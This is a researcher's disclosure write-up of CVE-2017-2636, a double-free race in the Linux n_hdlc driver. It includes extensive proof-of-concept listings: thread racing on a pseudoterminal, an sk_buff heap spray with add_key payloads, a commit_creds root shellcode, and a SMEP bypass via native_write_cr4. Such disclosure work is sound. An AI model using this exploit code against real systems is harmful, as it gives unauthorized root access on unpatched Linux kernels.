This article discloses the exploitation of CVE-2017-2636, which is a race condition in the n_hdlc Linux kernel driver. My PoC exploit for x86_64 gains root privileges and bypasses Supervisor Mode Execution Protection (SMEP).

This driver (drivers/tty/n_hdlc.c) provides HDLC serial line discipline and comes as a kernel module in many Linux distributions, which have CONFIG_N_HDLC=m in the kernel config. So RHEL 6/7, Fedora, SUSE, Debian, and Ubuntu were affected by CVE-2017-2636.

Currently the flaw is fixed in the mainline Linux kernel (public disclosure). The bug was introduced quite a long time ago, so the patch is backported to the stable kernel versions too.

I've managed to make the proof-of-concept exploit quite stable and fast. It crashes the kernel very rarely and gains a root shell in less than 20 seconds (at least on my machines). This PoC defeats SMEP, but doesn't cope with Supervisor Mode Access Prevention (SMAP), although that is possible with some additional effort.

My PoC also doesn't defeat Kernel Address Space Layout Randomization (KASLR) and needs to know the kernel code offset. This offset can be obtained using a kernel pointer leak or the prefetch side-channel attack (see xairy's implementation).

First of all let's watch the demo video!

The n_hdlc bug

Initially, the N_HDLC line discipline used a self-made singly linked list for data buffers and had the n_hdlc.tbuf pointer for retransmitting a buffer after an error. It worked, but the commit be10eb75893 added data flushing and introduced racy access to n_hdlc.tbuf.

After a tx error, concurrent flush_tx_queue() and n_hdlc_send_frames() both use n_hdlc.tbuf and can put one buffer on tx_free_buf_list twice. That causes an exploitable double-free error in n_hdlc_release(). The data buffers are represented by struct n_hdlc_buf and are allocated in the kmalloc-8192 slab cache.

To fix this bug, I used a standard kernel linked list and got rid of the racy n_hdlc.tbuf: in case of a tx error, the current n_hdlc_buf item is put after the head of tx_buf_list.

I started the investigation when I got a suspicious kernel crash from syzkaller. It is a really great project, which has helped to fix an impressively big list of bugs in the Linux kernel.

Exploitation

This article is the only way for me to publish the exploit code. So, please, be patient and prepare for plenty of listings!

Winning the race

Let's look at the code of the main loop, which keeps racing until it succeeds.

for (;;) {
	long tmo1 = 0;
	long tmo2 = 0;

	if (loop % 2 == 0)
		tmo1 = loop % MAX_RACE_LAG_USEC;
	else
		tmo2 = loop % MAX_RACE_LAG_USEC;

The loop counter is incremented every iteration, so tmo1 and tmo2 variables are changing too. They are used for making lags in the racing threads, which:

synchronize at the pthread_barrier,
spin the specified number of microseconds in a busy loop,
interact with n_hdlc.

Colliding the threads this way helps to hit the race condition sooner.
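The three steps above can be modelled in plain userspace code. This is only a minimal sketch, not the exploit's thread functions: struct racer, racer_fn(), race_round() and pick_lags() are hypothetical names, the n_hdlc interaction is replaced by a timestamp, and the maximum lag is passed as a parameter because the value of MAX_RACE_LAG_USEC is not shown here.

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <pthread.h>
#include <stdint.h>
#include <time.h>

/* Hypothetical per-thread state; not taken from the exploit. */
struct racer {
	pthread_barrier_t *barrier;	/* shared start line */
	long lag_usec;			/* busy-wait after the barrier */
	uint64_t start_ns;		/* set right after the barrier */
	uint64_t fire_ns;		/* set where the racing call would go */
};

static uint64_t now_ns(void)
{
	struct timespec ts;

	clock_gettime(CLOCK_MONOTONIC, &ts);
	return (uint64_t)ts.tv_sec * 1000000000ull + (uint64_t)ts.tv_nsec;
}

/* Same alternation as in the main loop: only one of the lags is non-zero. */
static void pick_lags(long loop, long max_lag_usec, long *tmo1, long *tmo2)
{
	assert(max_lag_usec > 0);
	*tmo1 = 0;
	*tmo2 = 0;
	if (loop % 2 == 0)
		*tmo1 = loop % max_lag_usec;
	else
		*tmo2 = loop % max_lag_usec;
}

static void *racer_fn(void *arg)
{
	struct racer *r = arg;
	int ret = pthread_barrier_wait(r->barrier);

	assert(ret == 0 || ret == PTHREAD_BARRIER_SERIAL_THREAD);
	(void)ret;
	r->start_ns = now_ns();
	/* Spin instead of sleeping, so the delay is not rounded by the scheduler. */
	while (now_ns() - r->start_ns < (uint64_t)r->lag_usec * 1000)
		;
	r->fire_ns = now_ns();
	return NULL;
}

/* Runs one round with two threads; returns 0 on success, -1 on error. */
static int race_round(long lag1_usec, long lag2_usec,
		      struct racer *r1, struct racer *r2)
{
	pthread_barrier_t barrier;
	pthread_t t1, t2;
	int ret = 0;

	if (pthread_barrier_init(&barrier, NULL, 2) != 0)
		return -1;
	*r1 = (struct racer){ .barrier = &barrier, .lag_usec = lag1_usec };
	*r2 = (struct racer){ .barrier = &barrier, .lag_usec = lag2_usec };

	if (pthread_create(&t1, NULL, racer_fn, r1) != 0) {
		pthread_barrier_destroy(&barrier);
		return -1;
	}
	if (pthread_create(&t2, NULL, racer_fn, r2) != 0) {
		/* Release the first thread by taking the second barrier slot. */
		pthread_barrier_wait(&barrier);
		ret = -1;
	} else {
		pthread_join(t2, NULL);
	}
	pthread_join(t1, NULL);
	pthread_barrier_destroy(&barrier);
	return ret;
}
```

Calling pick_lags() with an increasing loop counter and feeding the result to race_round() sweeps the relative delay between the two threads, which is the effect described above.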

	ptmd = open("/dev/ptmx", O_RDWR);
	if (ptmd < 0) {
		perror("[-] open /dev/ptmx");
		goto end;
	}

	ret = ioctl(ptmd, TIOCSETD, &ldisc);
	if (ret < 0) {
		perror("[-] TIOCSETD");
		goto end;
	}

Here we open a pseudoterminal master and slave pair and set the N_HDLC line discipline for it. For more information about that, see man ptmx, Documentation/serial/tty.txt and this great discussion about pty components.

Setting the N_HDLC ldisc for a serial line causes the n_hdlc kernel module to be autoloaded. You can get the same effect using the ldattach daemon.

	ret = ioctl(ptmd, TCXONC, TCOOFF);
	if (ret < 0) {
		perror("[-] TCXONC TCOOFF");
		goto end;
	}

	bytes = write(ptmd, buf, TTY_BUF_SZ);
	if (bytes != TTY_BUF_SZ) {
		printf("[-] write to ptmx (bytes)\n");
		goto end;
	}

Here we suspend the pseudoterminal output (see man tty_ioctl) and write one data buffer. The n_hdlc_send_frames() fails to send this buffer and saves its address in n_hdlc.tbuf.

We are ready for the race. Start two threads, which are allowed to run on all available CPU cores:

thread 1: flush the data with ioctl(ptmd, TCFLSH, TCIOFLUSH);
thread 2: start the suspended output with ioctl(ptmd, TCXONC, TCOON).

In a lucky case, they both put the only written buffer, which is pointed to by n_hdlc.tbuf, on tx_free_buf_list.

Now we return to CPU 0 and trigger the possible double-free error:

	ret = sched_setaffinity(0, sizeof(single_cpu), &single_cpu);
	if (ret != 0) {
		perror("[-] sched_setaffinity");
		goto end;
	}

	ret = close(ptmd);
	if (ret != 0) {
		perror("[-] close /dev/ptmx");
		goto end;
	}

We close the pseudoterminal master. The n_hdlc_release() goes through n_hdlc_buf_list items and frees the kernel memory used for data buffers. Here the possible double-free error happens.
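The listing above passes a single_cpu set to sched_setaffinity() without showing how it is built. Below is a minimal sketch of how such a cpu_set_t might be prepared, presumably so that the frees and the later allocations go through the same per-CPU slab state. The helper names pin_to_cpu() and first_allowed_cpu() are hypothetical. The second helper is only there because CPU 0 may be unavailable in a restricted environment.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <sched.h>

/* Returns the lowest CPU number the calling thread may run on, or -1. */
static int first_allowed_cpu(void)
{
	cpu_set_t allowed;
	int cpu;

	if (sched_getaffinity(0, sizeof(allowed), &allowed) != 0)
		return -1;
	for (cpu = 0; cpu < CPU_SETSIZE; cpu++)
		if (CPU_ISSET(cpu, &allowed))
			return cpu;
	return -1;
}

/* Restricts the calling thread to one CPU; returns 0 on success. */
static int pin_to_cpu(int cpu)
{
	cpu_set_t single_cpu;

	assert(cpu >= 0 && cpu < CPU_SETSIZE);
	CPU_ZERO(&single_cpu);
	CPU_SET(cpu, &single_cpu);
	/* pid 0 means "the calling thread". */
	return sched_setaffinity(0, sizeof(single_cpu), &single_cpu);
}
```

With this sketch, pin_to_cpu(0) corresponds to the "return to CPU 0" step.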

This particular bug is successfully detected by the Kernel Address Sanitizer (KASAN), which reports the use-after-free happening just before the second kfree().

The final part of the main loop:

	ret = exploit_skb(socks, sockaddrs, payload, loop % SOCK_PAIRS);
	if (ret != EXIT_SUCCESS)
		goto end;

	if (getuid() == 0 && geteuid() == 0) {
		printf("[+] race #%ld: WIN! flush(%ld), TCOON(%ld)\n",
						loop, tmo1, tmo2);
		break; /* :) */
	}

	loop++;
}

printf("[+] finish as: uid=0, euid=0, start sh...\n");
run_sh();

Here we try to exploit the double-free error by overwriting struct sk_buff. In case of success, we exit from the main loop and run the root shell in the child process using execve().
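The body of run_sh() is not listed here. The fork-and-execve() pattern it is described as using could look roughly like the sketch below. run_child() is a hypothetical, generalized helper that takes the program path and arguments as parameters and returns the child's exit status.

```c
#include <assert.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/*
 * Forks, runs path with argv in the child and waits for it.
 * Returns the child's exit status, or -1 on error or abnormal exit.
 */
static int run_child(const char *path, char *const argv[])
{
	char *const envp[] = { NULL };	/* empty environment */
	int status = 0;
	pid_t pid;

	assert(path != NULL && argv != NULL);
	pid = fork();
	if (pid < 0)
		return -1;
	if (pid == 0) {
		execve(path, argv, envp);
		_exit(127);	/* only reached if execve() failed */
	}
	if (waitpid(pid, &status, 0) != pid)
		return -1;
	return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

The child inherits the credentials of the parent, which is why the shell is started only after getuid() and geteuid() both report 0.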

Exploiting the sk_buff

As I mentioned, the doubly freed n_hdlc_buf item is allocated in the kmalloc-8192 slab cache. To exploit a double-free error in this cache, we need some kernel objects with a size a bit less than 8 kB. Actually, we need two types of such objects:

one containing some function pointer,
another one with the controllable payload, which can overwrite that pointer.

Searching for such kernel objects and experimenting with them was not easy and took me some time. Finally, I've chosen sk_buff with its destructor_arg in struct skb_shared_info. This approach is not new – consider reading the cool write-up about CVE-2016-2384.

The network-related buffers in Linux kernel are represented by struct sk_buff. See these great pictures describing sk_buff data layout. The most important for us is that the network data and skb_shared_info are placed in the same kernel memory block pointed by sk_buff.head. So creating a 7500-byte network packet in the userspace will make skb_shared_info be allocated in the kmalloc-8192 slab cache. Exactly like we want.
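The size arithmetic behind that claim can be checked with a simplified model. It assumes that general-purpose kmalloc caches are powers of two (the 96-byte and 192-byte caches are ignored) and that 320 bytes are reserved for skb_shared_info. The latter is inferred from the SKB_END_OFFSET value of 7872 used later in this article (8192 - 7872), not read from kernel headers. Any extra header room that the network stack adds is ignored as well. The function names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>

/* Assumption: 8192 - SKB_END_OFFSET (7872), see the lead-in. */
#define SHINFO_RESERVED	320

/* Smallest power-of-two cache that fits size (simplified model). */
static size_t kmalloc_bucket(size_t size)
{
	size_t bucket = 8;

	assert(size > 0 && size <= ((size_t)1 << 22));
	while (bucket < size)
		bucket *= 2;
	return bucket;
}

/* Cache that would hold packet data plus the trailing shared info. */
static size_t skb_head_bucket(size_t data_len)
{
	return kmalloc_bucket(data_len + SHINFO_RESERVED);
}
```

In this model skb_head_bucket(7500) gives 8192, while anything that fits into 4096 bytes together with the reserved tail would land in a smaller cache and be useless for this spray.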

But there is one challenge: n_hdlc_release() frees 13 n_hdlc_buf items straight away. At first I was trying to do the heap spray in parallel with n_hdlc_release(), but didn't manage to inject the corresponding kmalloc() between the needed kfree() calls. So I used another way: spraying after n_hdlc_release() can give two sk_buff items with the head pointing to the same memory. That's promising.

So we need to spray hard but keep the 8 kB UDP packets allocated to avoid a mess in the allocator freelist. Socket queues are limited in size, so I've created a lot of sockets using socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP):

one client socket for sending UDP packets,
one dedicated server socket, which is likely to receive two packets with the same sk_buff.head,
200 server sockets for receiving other packets emitted during heap spray,
200 server sockets for receiving the packets emitted during slab exhaustion.

Ok. Now we need another kernel object for overwriting the function pointer in skb_shared_info.destructor_arg. We can't use sk_buff.head for that again, because skb_shared_info is placed at the same offset in sk_buff.head and we don't control it. I was really happy to find that the add_key syscall is able to allocate controllable data in kmalloc-8192 too.

But I became upset when I encountered the key data quotas in /proc/sys/kernel/keys/, which are owned by root. The default value of /proc/sys/kernel/keys/maxbytes is 20000. It means that only 2 add_key syscalls can concurrently store our 8 kB payload in the kernel memory, and that's not enough.
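The quota arithmetic is simple enough to check directly. This sketch divides the byte quota by the payload size and ignores any per-key overhead that the kernel may also charge, so it is an upper bound. concurrent_payloads() and read_key_maxbytes() are hypothetical helper names.

```c
#include <assert.h>
#include <stdio.h>

/* Upper bound on payloads that fit into the quota at the same time. */
static long concurrent_payloads(long maxbytes, long payload_sz)
{
	assert(payload_sz > 0);
	return maxbytes < 0 ? 0 : maxbytes / payload_sz;
}

/* Reads the live quota; returns -1 if the file cannot be read. */
static long read_key_maxbytes(void)
{
	FILE *f = fopen("/proc/sys/kernel/keys/maxbytes", "r");
	long value = -1;

	if (!f)
		return -1;
	if (fscanf(f, "%ld", &value) != 1)
		value = -1;
	fclose(f);
	return value;
}
```

With the default of 20000 and the 8100-byte payload used below, concurrent_payloads() returns 2.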

But the happiness returned when I encountered a bright idea in the slides of Di Shen from Keen Security Lab: I can make the heap spray successful even if add_key fails!

So, let's look at the init_payload() code:

#define MMAP_ADDR		0x10000lu
#define PAYLOAD_SZ		8100
#define SKB_END_OFFSET		7872
#define KEY_DATA_OFFSET		18

int init_payload(char *p)
{
	struct skb_shared_info *info = (struct skb_shared_info *)(p +
					SKB_END_OFFSET - KEY_DATA_OFFSET);
	struct ubuf_info *uinfo_p = NULL;

The definitions of struct skb_shared_info and struct ubuf_info are copied to the exploit code from the include/linux/skbuff.h kernel header.

The payload buffer will be passed to add_key as a parameter, and the data which we put there at 7872 - 18 = 7854 byte offset will exactly overwrite skb_shared_info.
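The offset calculation can be written down as a small self-check using only the constants from the listing above plus the 8192-byte object size. The helper names are hypothetical, and the meaning of KEY_DATA_OFFSET (the number of bytes the kernel places in front of the key data inside the same allocation) is taken from how the constant is used here.

```c
#include <assert.h>

#define SLAB_OBJ_SZ	8192	/* kmalloc-8192 object size */
#define PAYLOAD_SZ	8100
#define SKB_END_OFFSET	7872
#define KEY_DATA_OFFSET	18

/* Offset in the userspace payload that lands on slab offset slab_off. */
static long payload_offset(long slab_off)
{
	assert(slab_off >= KEY_DATA_OFFSET);
	return slab_off - KEY_DATA_OFFSET;
}

/* Non-zero if the header plus payload still fits into one slab object. */
static int payload_fits(void)
{
	return KEY_DATA_OFFSET + PAYLOAD_SZ <= SLAB_OBJ_SZ;
}

/* Payload bytes available from slab_off to the end of the payload. */
static long bytes_available_at(long slab_off)
{
	return PAYLOAD_SZ - payload_offset(slab_off);
}
```

payload_offset(SKB_END_OFFSET) gives 7854, and 246 payload bytes remain from that point, which is the window used for overwriting the beginning of skb_shared_info.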

	char *area = NULL;
	void *target_addr = (void *)(MMAP_ADDR);

	area = mmap(target_addr, 0x1000, PROT_READ | PROT_WRITE,
			MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (area != target_addr) {
		perror("[-] mmap");
		return EXIT_FAILURE;
	}

	uinfo_p = target_addr;
	uinfo_p->callback = (uint64_t)root_it;

	info->destructor_arg = (uint64_t)uinfo_p;
	info->tx_flags = SKBTX_DEV_ZEROCOPY;

The ubuf_info.callback is called in skb_release_data() if skb_shared_info.tx_flags has SKBTX_DEV_ZEROCOPY flag set to 1. In our case, ubuf_info item resides in the userspace memory, so dereferencing its pointer in the kernelspace will be detected by SMAP.

Anyway, now the callback points to root_it(), which does the classical commit_creds(prepare_kernel_cred(0)). However, this shellcode resides in the userspace too, so executing it in the kernelspace will be detected by SMEP. We are going to bypass it soon.

Heap spraying and stabilization

As I mentioned, n_hdlc_release() frees thirteen n_hdlc_buf items. Our exploit_skb() is executed shortly after that. Here we do the actual heap spraying by sending twenty 7500-byte UDP packets. Experiments showed that the packets number 12, 13, 14, and 15 are likely to be exploitable, so they are sent to the dedicated server socket.

Now we are going to perform the use-after-free on sk_buff.data:

receive 4 network packets on the dedicated server socket one by one,
execute several add_key syscalls with our payload after receiving each of them.

The exact number of add_key syscalls giving the best results was found empirically by testing the exploit many times. The example of add_key call:

k[0] = syscall(__NR_add_key, "user", "payload0",
			payload, PAYLOAD_SZ, KEY_SPEC_PROCESS_KEYRING);

If we won the race and the heap spray was lucky, then our shellcode is executed when the poisoned packet is received. After that we can invalidate the keys that were successfully allocated in the kernel memory:

for (i = 0; i < KEYS_N; i++) {
	if (k[i] > 0)
		syscall(__NR_keyctl, KEYCTL_INVALIDATE, k[i]);
}

Now we need to prepare the heap for the next round of n_hdlc racing. /proc/slabinfo shows that a kmalloc-8192 slab stores only 4 objects, so a double-free error is very likely to crash the allocator. But the following trick helps to avoid that and makes the exploit much more stable: send a dozen UDP packets to fill the partially emptied slabs.

SMEP bypass

As I mentioned, the root_it() shellcode resides in the userspace. Executing it in the kernelspace is detected by SMEP (Supervisor Mode Execution Protection). It is an x86 feature, which is enabled by setting bit 20 of the CR4 register.
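The CR4 bits mentioned in this article can be decoded with a few masks. The bit positions (18 for OSXSAVE, 20 for SMEP, 21 for SMAP) are architectural. The sample value 0x1406e0 in the usage note is only an illustrative CR4 value with SMEP set, and the helper names are hypothetical.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define X86_CR4_OSXSAVE	(UINT64_C(1) << 18)
#define X86_CR4_SMEP	(UINT64_C(1) << 20)
#define X86_CR4_SMAP	(UINT64_C(1) << 21)

static_assert(X86_CR4_SMEP == 0x100000, "SMEP is bit 20 of CR4");

/* True if the given feature bit is set in a CR4 value. */
static bool cr4_has(uint64_t cr4, uint64_t bit)
{
	return (cr4 & bit) != 0;
}

/* The same CR4 value with only the SMEP bit cleared. */
static uint64_t cr4_without_smep(uint64_t cr4)
{
	return cr4 & ~X86_CR4_SMEP;
}
```

For example, cr4_without_smep(0x1406e0) yields 0x406e0: every other feature bit is preserved and only the SMEP bit changes.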

There are several approaches to defeat it, for example, Vitaly Nikolenko describes how to switch off SMEP using stack pivoting ROP technique. It works great, but I didn't want to copy it blindly. So I've created another quite funny way to defeat SMEP without ROP. Please inform me if that approach is already known.

In arch/x86/include/asm/special_insns.h I've found this function:

static inline void native_write_cr4(unsigned long val)
{
	asm volatile("mov %0,%%cr4": : "r" (val), "m" (__force_order));
}

It writes its first argument to CR4.

Now let's look at skb_release_data(), which executes the hijacked callback in Ring 0:

	if (shinfo->tx_flags & SKBTX_DEV_ZEROCOPY) {
		struct ubuf_info *uarg;

		uarg = shinfo->destructor_arg;
		if (uarg->callback)
			uarg->callback(uarg, true);
	}

We see that the destructor callback takes uarg address as the first argument. And we control this address in the exploited sk_buff.

So I've decided to write the address of native_write_cr4() to ubuf_info.callback and put ubuf_info item at the mmap'ed userspace address 0x406e0, which is the correct value of CR4 with disabled SMEP.

In that case SMEP is disabled on one CPU core without any ROP. However, now we need to win the race twice: first time to disable SMEP, second time to execute the shellcode. But it's not a problem for this particular exploit since it is fast and reliable.

So let's initialize the payload a bit differently:

	#define CR4_VAL	0x406e0lu

	void *target_addr = (void *)(CR4_VAL & 0xfffff000lu);

	area = mmap(target_addr, 0x1000, PROT_READ | PROT_WRITE,
			MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (area != target_addr) {
		perror("[-] mmap");
		return EXIT_FAILURE;
	}

	uinfo_p = (struct ubuf_info *)CR4_VAL;
	uinfo_p->callback = NATIVE_WRITE_CR4;

	info->destructor_arg = (uint64_t)uinfo_p;
	info->tx_flags = SKBTX_DEV_ZEROCOPY;

That SMEP bypass looks witty, but introduces one additional requirement - it needs bit 18 (OSXSAVE) of CR4 set to 1. Otherwise target_addr becomes 0 and mmap() fails, since mapping the zero page is not allowed.
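The address arithmetic behind that requirement can be verified in isolation. This is a sketch with hypothetical helper names. The mmap_min_addr parameter is an assumption that stands for the lowest address the system lets an unprivileged process map, and 65536 is used in the usage note as a commonly seen default.

```c
#include <assert.h>
#include <stdint.h>

#define CR4_VAL		UINT64_C(0x406e0)
#define CR4_OSXSAVE_BIT	(UINT64_C(1) << 18)

/* Page-aligned base passed to mmap(), using the mask from the listing. */
static uint64_t map_base_for(uint64_t cr4_val)
{
	return cr4_val & UINT64_C(0xfffff000);
}

/* Offset of the object inside that page. */
static uint64_t offset_in_page(uint64_t cr4_val)
{
	return cr4_val & UINT64_C(0xfff);
}

/* Non-zero if the base is non-zero and not below the assumed minimum. */
static int above_min_addr(uint64_t base, uint64_t mmap_min_addr)
{
	return base != 0 && base >= mmap_min_addr;
}
```

For 0x406e0 the base is 0x40000 and the object sits at offset 0x6e0 in the page, which passes above_min_addr() with a minimum of 65536. With bit 18 cleared the value becomes 0x6e0, the base collapses to 0 and the check fails.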

Conclusion

Investigating CVE-2017-2636 and writing this article was great fun for me. I want to thank Positive Technologies for giving me the opportunity to work on this research. I would really appreciate feedback. See my contacts below.